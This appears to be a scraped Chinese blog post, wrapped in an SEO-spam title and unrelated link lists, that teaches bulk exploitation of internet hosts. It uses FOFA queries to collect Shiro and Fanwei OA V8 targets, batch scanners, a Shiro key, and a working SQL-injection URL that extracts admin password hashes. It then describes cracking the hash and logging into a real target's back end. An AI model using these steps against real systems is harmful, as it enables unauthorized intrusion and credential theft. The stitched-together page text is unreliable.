当前位置: 首页 > news >正文

网站建设管理制度九不准网站数据迁移教程

网站建设管理制度九不准,网站数据迁移教程,网站开发工具 哪个好,漳州住房和城乡建设部网站漏洞挖掘是指对应用程序中未知漏洞的探索#xff0c;通过综合应用各种技术和工具#xff0c;尽可能地找出其中的潜在漏洞。一般情况下漏洞挖掘针对单一的应用系统#xff0c;通过端口扫描、目录扫描、文件扫描等方式对其安全性进行评估#xff0c;而本文主要针对Nday和1day…漏洞挖掘是指对应用程序中未知漏洞的探索通过综合应用各种技术和工具尽可能地找出其中的潜在漏洞。一般情况下漏洞挖掘针对单一的应用系统通过端口扫描、目录扫描、文件扫描等方式对其安全性进行评估而本文主要针对Nday和1day的漏洞挖掘帮助初学者在前期能够在公益漏洞榜单中刷积分当然运气好有时候也能挖掘到大型企业的漏洞可以提交至专门的src机构获取现金奖励。 0x01 整体思路 整体思路主要如下所示下面通过Shiro反序列化漏洞和泛微OA V8的SQL注入漏洞进行演示。 1、寻找Nday或1day漏洞 2、寻找漏洞所在应用程序特征 3、通过fofaApi导出对应的IP地址 4、通过批量检测工具对导出的IP地址进行筛选 5、验证漏洞并进行漏洞利用 6.、编写漏洞报告并上交src 0x02 漏洞挖掘 Shiro反序列化漏洞 Shiro框架通过记住我的功能在用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe并对相关信息进行序列化先使用aes加密然后再使用base64编码处理形成的。在网上关于Shiro反序列化的介绍很多我这里就只简单介绍一下详情各位可以看下大神们对其源码的分析。 一通过fofa寻找特征 appApache-Shiro headerremembermedeleteMe headershiroCookie 二通过fofaApi导出相应的IP地址 项目地址https://github.com/k-fire/fofa-tool 因为我开了fofa会员可以直接在fofa.ini中配置邮箱地址和api然后在下载的脚本目录下执行语句 python3 fofa-api.py规则 {rule:appApache-Shiro headerremembermedeleteMe,page:,size:10000,fields:host,is_full:}三通过批量检测工具对导出的IP地址进行筛选 项目地址1https://github.com/arno567/ShiroScanF 项目地址2https://github.com/sv3nbeast/ShiroScan 1、下载这两个项目主要使用ShiroScanF来进行批量检测 2、从ShiroScan中下载ysoserial.jar放在其目录下 3、访问http://ceye.io/profile获取dnslog地址如果没注册则需要注册 4、修改shiroFscan.py第124行的dnslog地址 5、将fofaapi导出的out.txt中的地址放入目录url.txt中 6、在ShiroScanF目录下执行脚本 python3 shiroFscan.py7、查看dnslog返回的信息 8、利用反序列化攻击进行攻击 项目地址1https://github.com/j1anFen/shiro_attack/releases/tag/2.2 项目地址2https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 1shiro_attack 其中密钥 kPHbIxk5D2deZiIxcaaaA 在shiro_attack中不存在而是kPHbIxk5D2deZiIxcacaA虽然显示该秘钥不可用但是检查当前利用链还是可用的 成功执行命令whoami执行为root权限 2ShiroExploit 泛微OA V8 SQL注入漏洞 在泛微OA V8中的getdata.jsp文件里通过gatData方法将数据获取并回显在页面上而在getData方法中判断请求里cmd参数是否为空如果不为空调用proc方法。其中它存在四个参数分别为空字符串、cmd参数值、request对象以及serverContext对象通过对cmd参数值进行判断当cmd值等于getSelectAllId时再从请求中获取sql和type两个参数值并将参数传递进getSelectAllIdssql,type方法中从而在前台构造POC语句 http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmdgetSelectAllIdsqlselect%20password%20as%20id%20from%20HrmResourceManager一通过fofa寻找特征 app泛微-协同办公OA 二通过fofaApi导出相应的IP地址 项目地址https://github.com/k-fire/fofa-tool 在下载的脚本目录下执行语句 python3 fofa-api.py规则 {rule:app泛微-协同办公OA,page:,size:10000,fields:host,is_full:}三通过批量检测工具对导出的IP地址进行筛选 项目地址https://github.com/Yang0615777/PocList 1、进入下载项目下执行以下命令将fofaAPI导出地址放入即可进行检测 java -jar FanWeiOA-V8-SQLinjection.jar2、访问其中存在漏洞的网站http://x.x.x.x/login/Login.jsp?logintype1其中该特征属于泛微OA v8系统 3、通过SQL注入POC获取管理员密码http://x.x.x.x/js/hrm/getdata.jsp?cmdgetSelectAllIdsqlselect%20password%20as%20id%20from%20HrmResourceManager 4、md5解密得到密码为 ASD$%^123 5、登录目标后台 0x03 总结 本文主要介绍批量挖掘漏洞中的小技巧希望能帮助到刚入门的小白如果各位大佬还有其他批量挖掘思路欢迎在评论区留言探讨。 网络安全学习资源分享: 给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》需要点击下方链接即可前往获取  读者福利 | CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击 同时每个成长路线对应的板块都有配套的视频提供  大厂面试题 视频配套资料国内外网安书籍、文档 当然除了有配套的视频同时也为大家整理了各种文档和书籍资料 所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~  读者福利 | CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击  特别声明 此教程为纯技术分享本教程的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本教程的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失。
http://www.pierceye.com/news/357791/

相关文章:

  • 网站建设公司排行杭州wordpress站外链接跳转页面
  • 哪个网站可以做行程攻略哈尔滨市建设工程招标网
  • django网站开发实例望城建设局网站
  • 住房和城乡建设网站方案网页界面设计的网络系统有哪些
  • 自己做的网站怎么设置文件下载商城app搭建
  • 好看的网站分享查域名注册详细信息查询
  • 中山网站建设招聘宜宾seo快速排名
  • 网站制作 福宁网络有限公司单页网站seo优化
  • 增城做网站站长之家域名查询大全
  • 个人网站建设报价做游戏出租的网站好
  • 珠海网站建设公司哪家好织梦网站怎么做下载地址
  • 西安商城网站建设公司宁夏住宅建设发展公司网站
  • 网站建设实现用户登录济南网站建设找老兵
  • 做网站还挣钱吗成都网站设计策划免费
  • 阿里云服务器怎么放网站百度开户渠道商哪里找
  • 网赢天下深圳网站建设建设一个小说网站
  • 北湖区网站建设哪家好什么做网站的公司好
  • 做司法亲子鉴定网站专业设计服务网站
  • 网站建设排序题wordpress菜单左对齐
  • 太原网站建设方案维护北京网站建设东轩seo
  • 网站弹屏广告怎么做的自适应网站建设特点
  • 有一个网站专门做民宿做数据可视化图的网站
  • 手机产品 网站建设网站建设费怎么记账
  • 网站页面设计好了后台如何添加构建平台还是搭建平台
  • 公司展示类网站模板中国校园网站做的比较好的学校
  • 锡山建设局网站白云做网站的公
  • 上海网站制作软件wordpress 访问控制
  • 西部数码助手网站后台管理优秀的包装设计案例
  • 建站教学做门户网站怎么赚钱
  • 怎么自己编程做网站成都住建平台